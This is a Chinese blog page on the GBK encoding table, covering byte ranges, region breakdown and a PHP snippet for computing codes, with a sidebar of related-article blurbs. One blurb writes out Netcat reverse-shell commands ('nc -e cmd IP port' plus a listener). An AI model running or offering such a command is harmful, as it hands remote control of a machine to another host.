GBK编码表与编码字库

简介:

GBK编码的单字节与双字节
gbk编码分两部分,一部分是单字节编码,另一部分是双字节编码。
gbk编码中,前128个编码都是单字节编码。单字节编码从00-7F,与ASCII相对应。
在单字节编码之后就是双字节编码。第一个字节范围是81-FE。第二字节的一部分领域在40–7E,其他领域在80–FE。
这样可以通过第一个字节就可以判断是单字节编码还是双字节编码。

双字节编码区又分为5部分


范围	    第1字节	第2字节	        编码数	字数    内容
GBK/1	    A1–A9	A1–FE	        846	717     GB2312非汉字符号
GBK/2	    B0–F7	A1–FE	        6,768	6,763   GB2312 汉字
GBK/3	    81–A0	40–FE(7F除外)	6,080	6,080   扩充汉字
GBK/4	    AA–FE	40–A0(7F除外)	8,160	8,160   扩充汉字
GBK/5	    A8–A9	40–A0(7F除外)	192	166     扩充非汉字
用户定义    AA–AF	A1–FE	        564	
用户定义    F8–FE	A1–FE	        658	
用户定义    A1–A7	40–A0(7F除外)	672	
合计:			                23,940	21,886

GBK1-GBK5具体内容
GBK1[GB2312非汉字符号]
GBK2[GB2312 汉字]
GBK3[扩充汉字]
GBK4[扩充汉字]
GBK5[扩充非汉字]

五部分分布示意图:
638px-GBK_encoding_zh.svg

GBK编码计算方法



$word = mb_convert_encoding("一",'gbk','utf8');
$high = ord($word[0]);
$low = ord($word[1]);
$code = $high*256 + $low;
echo dechex($code);

汉字编码范围
0xB0A1 - 0xF7FE gb2312汉字 GBK2
0x8140 - 0xA0FE 扩充汉字 GBK3
0xAA40 - 0xFEA0 扩充汉字 GBK4


目录
相关文章
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
791 0
|
算法 安全 物联网
关于SM2、SM3、SM4、SM9这四种国密算法
本文介绍了四种国密算法——SM2、SM3、SM4和SM9。SM2是一种基于椭圆曲线的非对称加密算法,用于数据加密和数字签名;SM3是哈希算法,用于数字签名和消息完整性验证;SM4是对称加密算法,用于数据加密和解密;SM9是基于标识的非对称密码算法,适用于物联网环境中的数据安全和隐私保护。
10205 121
|
安全 编译器 程序员
C# 中 foreach 循环和 for 循环深度比较
为什么建议你多数情况下使用 foreach 进行遍历循环?看完你就明白了
439 5
|
机器学习/深度学习 人工智能 算法
【AI系统】推理流程全景
本文概述了神经网络模型在云侧和边缘侧部署的特点与挑战。云侧部署凭借强大的计算能力和集中的数据管理,适合高吞吐量应用,但面临高成本、网络延迟等问题;边缘侧部署则通过模型优化和硬件加速降低延迟和能耗,适用于资源受限的环境,但存在算力限制、数据分散等挑战。两种方式各有优劣,需根据实际需求选择。
528 5
|
SQL 监控 数据可视化
DolphinScheduler教程(02)- 系统架构设计(上)
DolphinScheduler教程(02)- 系统架构设计(上)
597 0
DolphinScheduler教程(02)- 系统架构设计(上)
|
数据安全/隐私保护
【Qt 学习笔记】Qt常用控件 | 输入类控件 | Line Edit的使用及说明
【Qt 学习笔记】Qt常用控件 | 输入类控件 | Line Edit的使用及说明
2192 0
|
JavaScript 前端开发 索引
JS中的substr()和substring()函数有什么区别
JS中的substr()和substring()函数有什么区别
|
测试技术 Linux 网络安全
跨平台开发:使用C语言编写跨平台应用程序。
跨平台开发:使用C语言编写跨平台应用程序。
|
Java
Java工程编码格式由GBK转化成utf-8(编码格式互转)
Java工程编码格式由GBK转化成utf-8(编码格式互转)
752 0
Java工程编码格式由GBK转化成utf-8(编码格式互转)
|
存储
Qt 5——添加资源文件方法步骤(图解)
Qt 5——添加资源文件方法步骤(图解)
1770 0
Qt 5——添加资源文件方法步骤(图解)